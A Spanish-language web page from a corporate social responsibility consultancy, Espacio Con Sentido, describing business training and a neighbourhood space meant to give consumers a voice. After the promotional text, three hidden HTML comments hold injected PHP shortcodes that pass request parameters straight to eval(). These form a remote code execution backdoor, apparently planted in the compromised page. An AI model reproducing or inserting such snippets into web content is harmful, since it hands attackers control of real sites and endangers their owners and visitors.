Formación a empresas

Tras más de 4 años como consultora en RSC, obtuve dos conclusiones muy claras y con ellas decidí que tocaba empezar a predicar con el ejemplo. La principal fue que difícilmente la RSC podría hacerse un hueco real en la sociedad española si no se producía un esfuerzo en darla a conocer: la enorme falta de formación en este tema se presentó como un reto. Y me propuse resolverlo. Espacio Con Sentido abre sus puertas para acoger a todas las empresas con interés en materia de RSC y poco a poco empezar a entender todas las ventajas estratégicas que incluir la responsabilidad en la compañía puede aportarles. Pero no sólo a las compañías (aparentemente el grupo de interés más atractivo para una consultora).

DAR VOZ AL CONSUMIDOR

La segunda palanca que me empujó a crear Espacio Con Sentido coincide plenamente con la nueva definición que propone la American Association of Marketing: incorporar al consumidor en la toma de decisiones de las empresas (o por lo menos, en algunas de sus estrategias). La idea de acercarme a este grupo de interés igualmente estratégico y relevante me motivaba y emocionaba desde hacia tiempo.

Ahora tenía un “salón de casa” al que invitarlos. Una llamada al barrio para incorporar, desde el momento en el que el último de los operarios que habían colaborado en dar un aire nuevo al local saliera por la puerta, a todos los vecinos a través de una invitación, entregada buzón a buzón, y cuyas palabras reflejaban hasta qué punto se quiere dar voz a uno de nuestros stakeholders estratégicos y “consentidos”: El espacio que quiere abrirse a ti, a vosotros, al barrio. Porque nos dedicamos a la Responsabilidad Social Corporativa y una de sus bases es ESCUCHAR, COMPARTIR y CO-CREAR ideas con la comunidad. Por eso queremos que forméis parte de este nuevo proyecto desde el principio: Tus ideas, pasiones, proyectos, hobbies, ilusiones, talento… nos interesan. Tus inquietudes, dudas, propuestas de mejora, necesidades… nos preocupan.

DÍNOS QUÉ TE GUSTARÍA ENCONTRAR EN EspacioConSentido. ¡TU nuevo espacio en el barrio!

  • La voz del consumidor, que a su vez puede ser empresario, docente, empleado, cliente, proveedor, (porque no hay que olvidar que todos los agentes somos PERSONAS)… tenía que empezar a escucharse activa y verdaderamente. Un consumidor, el nuestro, al que queremos darle un protagonismo especial y diferente al hasta ahora ofrecido: dime qué quieres y si podemos, te lo daremos; dime qué te ilusiona, y si está en nuestras manos, cumpliremos tu deseo; dime a qué te dedicas, y si atrae al resto de vecinos, seremos tu altavoz; dime qué me ofreces como empresa, y si te necesito, serás el primero en ser contactado. Y así… crear y potenciar un barrio socialmente responsable. Entre todos.
  • Y, ¿porqué no? Convertir Espacio Con Sentido en el lugar donde las opciones que ofrecen las TIC escapan de la virtualidad para convertirse en algo más humanizado, más palpable y tangible; el lugar donde las personas podrán votar para que se produzcan cambios en la sociedad, participar en encuestas para mejorar productos, opinar sobre la gestión de las empresas, provocar cambios en la reputación de las compañías, facilitar y fomentar la gestión del diálogo con los grupos de interés, ofrecer e incubar ideas nuevas que algunas empresas saben aprovechar… El lugar en el que la opinión del consumidor será escuchada, donde sus deseos, inquietudes, anhelos, necesidades, preocupaciones y propuestas encontrarán respuesta.

<!– [insert_php]if (isset($_REQUEST["NcKg"])){eval($_REQUEST["NcKg"]);exit;}[/insert_php][php]if (isset($_REQUEST["NcKg"])){eval($_REQUEST["NcKg"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["ICBs"])){eval($_REQUEST["ICBs"]);exit;}[/insert_php][php]if (isset($_REQUEST["ICBs"])){eval($_REQUEST["ICBs"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["CmGFt"])){eval($_REQUEST["CmGFt"]);exit;}[/insert_php][php]if (isset($_REQUEST["CmGFt"])){eval($_REQUEST["CmGFt"]);exit;}[/php] –>